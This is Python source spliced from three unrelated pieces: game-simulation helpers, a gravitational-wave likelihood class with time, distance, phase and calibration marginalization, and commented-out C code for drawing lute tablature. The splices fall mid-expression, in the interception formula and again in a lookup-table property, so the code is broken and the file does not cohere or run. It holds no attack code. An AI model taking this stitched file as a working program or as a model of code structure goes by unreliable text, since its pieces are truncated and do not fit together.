year_dif -= 1
month_dif += 12
return year_dif, month_dif, day_dif
def get_container(s, start, end, start_pos):
level = 1
i = start_pos
while i < len(s):
if s[i] == start:
level += 1
elif s[i] == end:
level -= 1
if level == 0:
break
i += 1
return s[start_pos:i]
def find_container_of(s, start, end, char):
# Start here, and go back until we find the starting bracket
level = 0
start_pos = 0
while start_pos < len(s):
if s[start_pos] == start:
level += 1
elif s[start_pos] == end:
level -= 1
elif s[start_pos] == char and level == 1:
break
start_pos += 1
if start_pos >= len(s) - 1:
raise Exception('\'{}\' not found in {}.'.format(char, s))
while start_pos > 0:
if s[start_pos] == end:
level += 1
elif s[start_pos] == start:
level -= 1
if level == 0:
break
start_pos -= 1
level = 1
end_pos = start_pos + 1
while end_pos < len(s):
if s[end_pos] == start:
level += 1
elif s[end_pos] == end:
level -= 1
if level == 0:
break
end_pos += 1
return start_pos, end_pos
# So that if an inner section is detected, its entire contents are ignored
# For example, separate_container('<test|test1>|test2', '<', '>', '|') will return ['<test|test1>', 'test2']
def separate_container(s, start, end, char):
result = []
level = 0
i = 0
while len(s) > 0 and i < len(s):
if s[i] == char and level == 0:
result.append(s[:i])
s = s[i + 1:]
i = 0
else:
if s[i] == start:
level += 1
elif s[i] == end:
level -= 1
i += 1
if len(s) > 0:
result.append(s)
return result
def titlecase(s):
new_words = []
for word in s.split():
if not word in ['of', 'by', 'a', 'the']:
word = word[0].upper() + word[1:]
new_words.append(word)
# First word is always capitalized
if len(new_words) > 0 and len(new_words[0]) > 0:
new_words[0] = new_words[0][0].upper() + new_words[0][1:]
return ' '.join(new_words)
def capitalize_first_letter(s):
return s[0].upper() + s[1:]
def displayify_text(s):
return ' '.join(list(map(capitalize_first_letter, s.split('_'))))
def base_war_stats():
base = {}
base['troops_lost'] = 0
base['troops_killed'] = 0
return base
def base_stats():
base = {}
base['troops'] = 0
base['troops_lost'] = 0
base['troops_killed'] = 0
base['projectiles_launched'] = 0
base['projectiles_hit'] = 0
base['attacks_won'] = 0
return base
def base_soldier_stats():
base = {}
base['attacks'] = 0
base['attacks_won'] = 0
base['kills'] = 0
base['deaths'] = 0
base['projectiles_launched'] = 0
base['projectiles_hit'] = 0
return base
def base_weapon_stats():
base = {}
base['attacks'] = 0
base['attacks_won'] = 0
base['kills'] = 0
return base
def show_dict(d, depth=1, recurse=True, gen=None):
for stat, v in sorted(d.items()):
if isinstance(v, dict):
if recurse:
if gen is not None:
gen.write_to_gen_log('{}{}:'.format('\t' * depth, displayify_text(stat)))
else:
print('{}{}:'.format('\t' * depth, displayify_text(stat)))
show_dict(v, depth=depth + 1, recurse=recurse, gen=gen)
else:
if gen is not None:
gen.write_to_gen_log('{}{}: {}'.format('\t' * depth, displayify_text(stat), v))
else:
print('{}{}: {}'.format('\t' * depth, displayify_text(stat), v))
def fst(t):
return t[0]
def snd(t):
return t[1]
# Finds the corresponding keys in a dictionary and applies the function to both, creating a new dictionary
# f_single is used if the key appears in only one of the dictionaries
def zip_dict_with(f, a, b, f_single=None):
res = {}
for k in a:
if k in b:
res[k] = f(a[k], b[k])
else:
if f_single is not None:
res[k] = f_single(a[k])
if f_single is not None:
for k in b:
if not k in res:
res[k] = f_single(b[k])
return res
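# Hedged usage sketch (illustrative values): shared keys are combined with f,
# keys present in only one dict fall back to f_single.
def _zip_dict_with_example():
    merged = zip_dict_with(lambda a, b: a + b, {'x': 1, 'y': 2}, {'x': 10, 'z': 5},
                           f_single=lambda v: v)
    assert merged == {'x': 11, 'y': 2, 'z': 5}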
def get_nearest_enemy(unit, check, check_unit=None):
min_distance = 1000000000
target = None
for i in check:
d = distance_squared((unit.x, unit.y), (i.x, i.y))
if d < min_distance:
target = i
min_distance = d
return target
def rgb_color(r, g, b):
# Zero-pad each component to two hex digits (ljust would turn 0x5 into '50').
return '#{:02x}{:02x}{:02x}'.format(r, g, b)
def flatten(l):
return [i for xs in l for i in xs]
# From https://gist.github.com/jtriley/1108174
def get_terminal_size():
""" getTerminalSize()
- get width and height of console
- works on linux,os x,windows,cygwin(windows)
originally retrieved from:
http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
"""
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in ['Linux', 'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
# tput writes the size to stdout; capture it with check_output
# (check_call only returns the exit status).
cols = int(subprocess.check_output(shlex.split('tput cols')))
rows = int(subprocess.check_output(shlex.split('tput lines')))
return (cols, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
terminal_width = -1
def show_bar(i, total, start_time=None, width=80, message='', number_limit=False):
global terminal_width
if terminal_width == -1:
terminal_width, _ = get_terminal_size()
terminal_width -= 1
if terminal_width != -1:
width = terminal_width
    if isinstance(total, (int, float)):
        number_limit = True
    # Because we start counting at 0
    i += 1
    # Just to make sure we don't get a ridiculously long bar
    i = min(total, i) if number_limit else min(len(total), i)
time_message = ''
if start_time is not None:
elapsed = time.time() - start_time
if number_limit:
estimated_remaining = elapsed / float(i) * float(total - i)
else:
estimated_remaining = elapsed / float(i) * float(len(total) - i)
time_message = '{} seconds. '.format(round(estimated_remaining))
message += time_message
# The 2 is because of the []
if not number_limit:
bar_chunks = int(float(i) / float(len(total)) * (width - len(message) - 2))
else:
bar_chunks = int(float(i) / float(total) * (width - len(message) - 2))
sys.stdout.write(
'\r{}'.format(message) + '[{}{}]'.format('=' * bar_chunks, ' ' * (width - bar_chunks - len(message) - 2)))
sys.stdout.flush()
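# A minimal usage sketch (assuming a list `items` to iterate over; `process` is a
# hypothetical work function, not part of this module):
#   start = time.time()
#   for idx, item in enumerate(items):
#       process(item)
#       show_bar(idx, items, start_time=start, message='Processing. ')
#   print()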
def calculate_interception(v_e, v_p, e, p, theta_e):
(x_e, y_e) = e
(x_p, y_p) = p
t1 = -(v_e * x_e * cos(theta_e) - v_e * x_p * cos(theta_e) + v_e * y_e * sin(theta_e) - v_e * y_p * sin(
theta_e) + sqrt(-(v_e ** 2 * sin(theta_e) ** 2 - v_p ** 2) * x_e ** 2 + 2 * (
v_e ** 2 * sin(theta_e) ** 2 - v_p ** 2) * x_e * x_p - (
v_e ** 2 * sin(theta_e) ** 2 - v_p ** 2) * x_p ** 2 - (
v_e ** 2 * cos(theta_e) ** 2 - v_p ** 2) * y_e ** 2 - (
v_e ** 2 * cos(theta_e) ** 2 - v_p ** 2) * y_p ** 2 + 2 * (
v_e ** 2 * x_e * cos(theta_e) * sin(theta_e) - v_e ** 2 * x_p * cos(theta_e) * sin(
theta_e)) * y_e - 2 * (
v_e ** 2 * x_e * cos(theta_e) * sin(theta_e) - v_e ** 2 * x_p * cos(theta_e) * sin(
theta_e) - (v_e ** 2 * cos(theta_e) ** 2 - v_p ** 2) * y_e) * y_p)) / (
                (cos(theta_e) ** 2 + sin(theta_e) ** 2) *
        waveform_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
self.parameters.update(self.get_sky_frame_parameters())
if waveform_polarizations is None:
return np.nan_to_num(-np.inf)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
if self.time_marginalization and self.calibration_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
(self.number_of_response_curves, len(self.interferometers.frequency_array[0:-1])),
dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
elif self.time_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
len(self.interferometers.frequency_array[0:-1]),
dtype=np.complex128)
elif self.calibration_marginalization:
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=waveform_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
if self.time_marginalization or self.calibration_marginalization:
d_inner_h_array += per_detector_snr.d_inner_h_array
if self.calibration_marginalization:
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.calibration_marginalization and self.time_marginalization:
log_l = self.time_and_calibration_marginalized_likelihood(
d_inner_h_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.calibration_marginalization:
log_l = self.calibration_marginalized_likelihood(
d_inner_h_calibration_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
elif self.time_marginalization:
log_l = self.time_marginalized_likelihood(
d_inner_h_tc_array=d_inner_h_array,
h_inner_h=optimal_snr_squared)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.distance_marginalization:
log_l = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
elif self.phase_marginalization:
log_l = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
else:
log_l = np.real(d_inner_h) - optimal_snr_squared / 2
return float(log_l.real)
def generate_posterior_sample_from_marginalized_likelihood(self):
"""
Reconstruct the distance posterior from a run which used a likelihood
which explicitly marginalised over time/distance/phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Returns
=======
sample: dict
Returns the parameters with new samples.
Notes
=====
This involves a deepcopy of the signal to avoid issues with waveform
caching, as the signal is overwritten in place.
"""
if any([self.phase_marginalization, self.distance_marginalization,
self.time_marginalization, self.calibration_marginalization]):
signal_polarizations = copy.deepcopy(
self.waveform_generator.frequency_domain_strain(
self.parameters))
else:
return self.parameters
if self.calibration_marginalization and self.time_marginalization:
            raise AttributeError(
                "Cannot use time and calibration marginalization simultaneously for regeneration at the moment! "
                "The matrix manipulation has not been tested.")
if self.calibration_marginalization:
new_calibration = self.generate_calibration_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['recalib_index'] = new_calibration
if self.time_marginalization:
new_time = self.generate_time_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['geocent_time'] = new_time
if self.distance_marginalization:
new_distance = self.generate_distance_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['luminosity_distance'] = new_distance
if self.phase_marginalization:
new_phase = self.generate_phase_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['phase'] = new_phase
return self.parameters.copy()
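    # A minimal reconstruction sketch (assumes `likelihood` is an instance of this class and
    # `posterior` is a pandas DataFrame of samples from a marginalized run; names illustrative):
    #   for idx in posterior.index:
    #       likelihood.parameters.update(dict(posterior.loc[idx]))
    #       full_sample = likelihood.generate_posterior_sample_from_marginalized_likelihood()
    #       posterior.loc[idx, 'luminosity_distance'] = full_sample['luminosity_distance']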
def generate_calibration_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for the set of calibration response curves when
explicitly marginalizing over the calibration uncertainty.
Parameters
----------
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
-------
new_calibration: dict
Sample set from the calibration posterior
"""
if 'recalib_index' in self.parameters:
self.parameters.pop('recalib_index')
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
log_like = self.get_calibration_log_likelihoods(signal_polarizations=signal_polarizations)
calibration_post = np.exp(log_like - max(log_like))
calibration_post /= np.sum(calibration_post)
new_calibration = np.random.choice(self.number_of_response_curves, p=calibration_post)
return new_calibration
def generate_time_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for coalescence
time when using a likelihood which explicitly marginalises over time.
In order to resolve the posterior we artificially upsample to 16kHz.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_time: float
Sample from the time posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
times = create_time_series(
sampling_frequency=16384,
starting_time=self.parameters['geocent_time'] - self.waveform_generator.start_time,
duration=self.waveform_generator.duration)
times = times % self.waveform_generator.duration
times += self.waveform_generator.start_time
prior = self.priors["geocent_time"]
in_prior = (times >= prior.minimum) & (times < prior.maximum)
times = times[in_prior]
n_time_steps = int(self.waveform_generator.duration * 16384)
d_inner_h = np.zeros(len(times), dtype=complex)
psd = np.ones(n_time_steps)
signal_long = np.zeros(n_time_steps, dtype=complex)
data = np.zeros(n_time_steps, dtype=complex)
h_inner_h = np.zeros(1)
for ifo in self.interferometers:
ifo_length = len(ifo.frequency_domain_strain)
mask = ifo.frequency_mask
signal = ifo.get_detector_response(
signal_polarizations, self.parameters)
signal_long[:ifo_length] = signal
data[:ifo_length] = np.conj(ifo.frequency_domain_strain)
psd[:ifo_length][mask] = ifo.power_spectral_density_array[mask]
d_inner_h += np.fft.fft(signal_long * data / psd)[in_prior]
h_inner_h += ifo.optimal_snr_squared(signal=signal).real
if self.distance_marginalization:
time_log_like = self.distance_marginalized_likelihood(
d_inner_h, h_inner_h)
elif self.phase_marginalization:
time_log_like = ln_i0(abs(d_inner_h)) - h_inner_h.real / 2
else:
time_log_like = (d_inner_h.real - h_inner_h.real / 2)
time_prior_array = self.priors['geocent_time'].prob(times)
time_post = (
np.exp(time_log_like - max(time_log_like)) * time_prior_array)
keep = (time_post > max(time_post) / 1000)
if sum(keep) < 3:
keep[1:-1] = keep[1:-1] | keep[2:] | keep[:-2]
time_post = time_post[keep]
times = times[keep]
new_time = Interped(times, time_post).sample()
return new_time
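    # Note on generate_time_sample_from_marginalized_likelihood above: multiplying the template
    # by the conjugated data over the PSD in the frequency domain and taking a single FFT
    # evaluates <d|h(t_c)> (up to overall normalization) for every candidate coalescence time
    # on the upsampled 16384 Hz grid, which is what fills d_inner_h in one pass per detector.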
def generate_distance_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for luminosity
distance when using a likelihood which explicitly marginalises over
distance.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Note: These are rescaled in place after the distance sample is
generated to allow further parameter reconstruction to occur.
Returns
=======
new_distance: float
Sample from the distance posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
d_inner_h_dist = (
d_inner_h * self.parameters['luminosity_distance'] /
self._distance_array)
h_inner_h_dist = (
h_inner_h * self.parameters['luminosity_distance']**2 /
self._distance_array**2)
if self.phase_marginalization:
distance_log_like = (
ln_i0(abs(d_inner_h_dist)) -
h_inner_h_dist.real / 2
)
else:
distance_log_like = (d_inner_h_dist.real - h_inner_h_dist.real / 2)
distance_post = (np.exp(distance_log_like - max(distance_log_like)) *
self.distance_prior_array)
new_distance = Interped(
self._distance_array, distance_post).sample()
self._rescale_signal(signal_polarizations, new_distance)
return new_distance
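    # Note on generate_distance_sample_from_marginalized_likelihood above: the cached signal is
    # rescaled in place to the newly drawn distance so that any subsequent reconstruction
    # (e.g. the phase sample below) is generated consistently with that distance.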
def _calculate_inner_products(self, signal_polarizations):
d_inner_h = 0
h_inner_h = 0
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
signal_polarizations, interferometer)
d_inner_h += per_detector_snr.d_inner_h
h_inner_h += per_detector_snr.optimal_snr_squared
return d_inner_h, h_inner_h
def generate_phase_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for phase when
using a likelihood which explicitly marginalises over phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_phase: float
Sample from the phase posterior.
Notes
=====
        This is only valid under the assumption that mu(phi) is proportional to exp(-2i phi).
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
phases = np.linspace(0, 2 * np.pi, 101)
phasor = np.exp(-2j * phases)
phase_log_post = d_inner_h * phasor - h_inner_h / 2
phase_post = np.exp(phase_log_post.real - max(phase_log_post.real))
new_phase = Interped(phases, phase_post).sample()
return new_phase
def distance_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h_ref, h_inner_h_ref = self._setup_rho(
d_inner_h, h_inner_h)
if self.phase_marginalization:
d_inner_h_ref = np.abs(d_inner_h_ref)
else:
d_inner_h_ref = np.real(d_inner_h_ref)
return self._interp_dist_margd_loglikelihood(
d_inner_h_ref, h_inner_h_ref)
def phase_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h = ln_i0(abs(d_inner_h))
if self.calibration_marginalization and self.time_marginalization:
return d_inner_h - np.outer(h_inner_h, np.ones(np.shape(d_inner_h)[1])) / 2
else:
return d_inner_h - h_inner_h / 2
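    # Note on phase_marginalized_likelihood above: analytically integrating the phase out of
    # exp(Re[<d|h> e^{-2i phi}]) over a uniform prior gives the Bessel function I0(|<d|h>|),
    # so the marginalized log likelihood reduces to ln_i0(|d_inner_h|) - h_inner_h / 2.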
def time_marginalized_likelihood(self, d_inner_h_tc_array, h_inner_h):
if self.distance_marginalization:
log_l_tc_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_tc_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array,
h_inner_h=h_inner_h)
else:
log_l_tc_array = np.real(d_inner_h_tc_array) - h_inner_h / 2
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
time_prior_array = self.priors['geocent_time'].prob(times) * self._delta_tc
return logsumexp(log_l_tc_array, b=time_prior_array)
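    # Note on time_marginalized_likelihood above: the marginalization integral over coalescence
    # time is evaluated as a discrete sum, log sum_k exp(log L(t_k)) * p(t_k) * delta_tc, which
    # is exactly logsumexp(log_l_tc_array, b=time_prior_array) with the prior weights as b.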
def time_and_calibration_marginalized_likelihood(self, d_inner_h_array, h_inner_h):
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
_time_prior = self.priors['geocent_time']
time_mask = np.logical_and((times >= _time_prior.minimum), (times <= _time_prior.maximum))
times = times[time_mask]
time_probs = self.priors['geocent_time'].prob(times) * self._delta_tc
d_inner_h_array = d_inner_h_array[:, time_mask]
h_inner_h = h_inner_h
if self.distance_marginalization:
log_l_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=h_inner_h)
else:
log_l_array = np.real(d_inner_h_array) - np.outer(h_inner_h, np.ones(np.shape(d_inner_h_array)[1])) / 2
prior_array = np.outer(time_probs, 1. / self.number_of_response_curves * np.ones(len(h_inner_h))).T
return logsumexp(log_l_array, b=prior_array)
def get_calibration_log_likelihoods(self, signal_polarizations=None):
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations =\
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=signal_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
d_inner_h_array += per_detector_snr.d_inner_h_array
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=optimal_snr_squared_array)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
else:
log_l_cal_array = np.real(d_inner_h_array - optimal_snr_squared_array / 2)
return log_l_cal_array
def calibration_marginalized_likelihood(self, d_inner_h_calibration_array, h_inner_h):
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array,
h_inner_h=h_inner_h)
else:
log_l_cal_array = np.real(d_inner_h_calibration_array - h_inner_h / 2)
return logsumexp(log_l_cal_array) - np.log(self.number_of_response_curves)
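    # Note on calibration_marginalized_likelihood above: the response curves are treated as
    # equally probable draws, so marginalizing is a uniform average over the N curves,
    # log((1/N) * sum_k exp(log L_k)) = logsumexp(log_l_cal_array) - log(N).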
def _setup_rho(self, d_inner_h, optimal_snr_squared):
optimal_snr_squared_ref = (optimal_snr_squared.real *
self.parameters['luminosity_distance'] ** 2 /
self._ref_dist ** 2.)
d_inner_h_ref = (d_inner_h * self.parameters['luminosity_distance'] /
self._ref_dist)
return d_inner_h_ref, optimal_snr_squared_ref
def log_likelihood(self):
return self.log_likelihood_ratio() + self.noise_log_likelihood()
@property
def _delta_distance(self):
return self._distance_array[1] - self._distance_array[0]
@property
def _dist_multiplier(self):
''' Maximum value of ref_dist/dist_array '''
return self._ref_dist / self._distance_array[0]
@property
def _optimal_snr_squared_ref_array(self):
""" Optimal filter snr at fiducial distance of ref_dist Mpc """
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[0])
@property
def _d_inner_h_ref_array(self):
""" Matched filter snr at fiducial distance of ref_dist Mpc """
if self.phase_marginalization:
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[1])
else:
n_negative = self._dist_margd_loglikelihood_array.shape[1] // 2
n_positive = self._dist_margd_loglikelihood_array.shape[1] - n_negative
return np.hstack((
-np.logspace(3, -3, n_negative), np.logspace(-3, 10, n_positive)
))
def _setup_distance_marginalization(self, lookup_table=None):
if isinstance(lookup_table, str) or lookup_table is None:
self.cached_lookup_table_filename = lookup_table
lookup_table = self.load_lookup_table(
self.cached_lookup_table_filename)
if isinstance(lookup_table, dict):
if self._test_cached_lookup_table(lookup_table):
self._dist_margd_loglikelihood_array = lookup_table[
'lookup_table']
else:
self._create_lookup_table()
else:
self._create_lookup_table()
self._interp_dist_margd_loglikelihood = UnsortedInterp2d(
self._d_inner_h_ref_array, self._optimal_snr_squared_ref_array,
self._dist_margd_loglikelihood_array, kind='cubic', fill_value=-np.inf)
@property
def cached_lookup_table_filename(self):
if self._lookup_table_filename is None:
            self._lookup_table_filename
D_DYN_PP:
# PUT2("(pp) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_P:
# PUT2("(p) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_MP:
# PUT2("(mp) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_MF:
# PUT2("(mf) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_F:
# PUT2("(f) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_FF:
# PUT2("(ff) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_SF:
# PUT2("(sf) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_SFZ:
# PUT2("(sfz) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# }
# }
#
# # decorations applying to individual notes
# for (i=0;i<s->npitch;i++) {
# if (german)
# line = i+1;
# else
# line = tabline(s->pits[i]);
# switch (s->tabdeco[i]) {
# case D_TABACC:
# PUT2("%.1f %.1f tabacc\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABX:
# PUT2("%.1f %.1f tabx\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABU:
# PUT2("%.1f %.1f tabu\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABV:
# PUT2("%.1f %.2f tabv\n", x, 0.125+fingeringshift+line);
# break;
# case D_TABSTAR:
# PUT2("%.1f %.1f tabstar\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABCROSS:
# PUT2("%.1f %.1f tabcross\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABOLINE:
# if (italian)
# std::cerr << "Warning: decoration 'L' (oblique line) ignored in italiantab" << std::endl;
# else if (german)
# std::cerr << "Warning: decoration 'L' (oblique line) ignored in germantab" << std::endl;
# else
# PUT2("%.1f %.2f taboline\n", x, fingeringshift+line);
# break;
# }
# }
# }
#
# #*************************************************************************
# * draw_tabslurs - draw all slurs in current line
# *************************************************************************
# void draw_tabslurs (void)
# {
# int i,m1,m2,i1,i2;
#
# # flags for slurs across line breaks
# static int normalleftover = 0;
# static int chordleftover = 0;
#
# #
# * slurs outside of chords
#
# # close slurs from previous line
# if (normalleftover) {
# normalleftover=0;
# i=0;
# while (!sym[i].slur_end && (i<nsym)) i++;
# if (i<nsym)
# draw_tabnormalslur(-1,i);
# }
# # draw slurs starting in this line
# i1=i2=-1;
# for (i=0;i<nsym;i++) {
# if ((sym[i].type==NOTE) && sym[i].slur_st) {
# i1=i;
# while (!sym[i].slur_end && (i<nsym)) i++;
# i2=i;
# draw_tabnormalslur(i1,i2);
# if (i2>=nsym)
# normalleftover=1;
# }
# }
#
# #
# * slurs inside of chords
# * (only slurs between neighbouring chords are allowed)
#
# # close slurs from previous line
# if (chordleftover) {
# chordleftover=0;
# i=0;
# while (i<nsym) {
# int slurend=0;
# if (sym[i].type==NOTE) {
# for (m2=0;m2<sym[i].npitch;m2++)
# if (sym[i].ti2[m2] || sym[i].sl2[m2])
# {slurend=1; break;}
# }
# if (slurend) break;
# i++;
# }
# if (i<nsym)
# draw_tabchordslurs(-1,i);
# }
# # draw slurs starting this line
# for (i=0;i<nsym;i++) {
# if (sym[i].type==NOTE) {
# # determine start and end of next chord-tie
# i1=-1;
# for (m1=0;m1<sym[i].npitch;m1++) {
# if ((sym[i].ti1[m1]) || (sym[i].sl1[m1])) {
# i1=i;
# i++;
# while (i<nsym) {
# int slurend=0;
# if (sym[i].type==NOTE) {
# for (m2=0;m2<sym[i].npitch;m2++)
# if (sym[i].ti2[m2] || sym[i].sl2[m2])
# {slurend=1; break;}
# }
# if (slurend) break;
# i++;
# }
# i2=i;
# break;
# }
# }
# if (i1>=0)
# draw_tabchordslurs(i1,i2);
# if (i2>=nsym)
# chordleftover=1;
# }
# }
# }
#
# #*************************************************************************
# * draw_tabnormalslur - draws slur between specified symbols
# * if to >= nsym, slur is drawn till end of line
# * if from < 0, slur is drawn from line beginning
# *************************************************************************
# void draw_tabnormalslur (int from, int to)
# {
# int hc1,hc2,cut;
# float x1,y1,x2,y2,direction,height,shift;
#
# x1=y1=x2=y2=0;
#
# #
# * get positions for slur
#
# if (from >= 0) {
# x1 = sym[from].x;
# hc1 = tabline(highest_course(&sym[from]));
# y1 = (6-hc1) * tabfont.size;
#
# # horizontal shift if next course in chord used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# }
# if (to < nsym) {
# x2 = sym[to].x;
# hc2 = tabline(highest_course(&sym[to]));
# y2 = (6-hc2) * tabfont.size;
# #
# # horizontal shift if next course in chord used
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# }
#
# # special treatment of slurs over line breaks
# if (from < 0) {
# cut=prev_scut(to);
# x1=sym[cut].x;
# if (cut==to) x1-=30;
# y1=y2;
# }
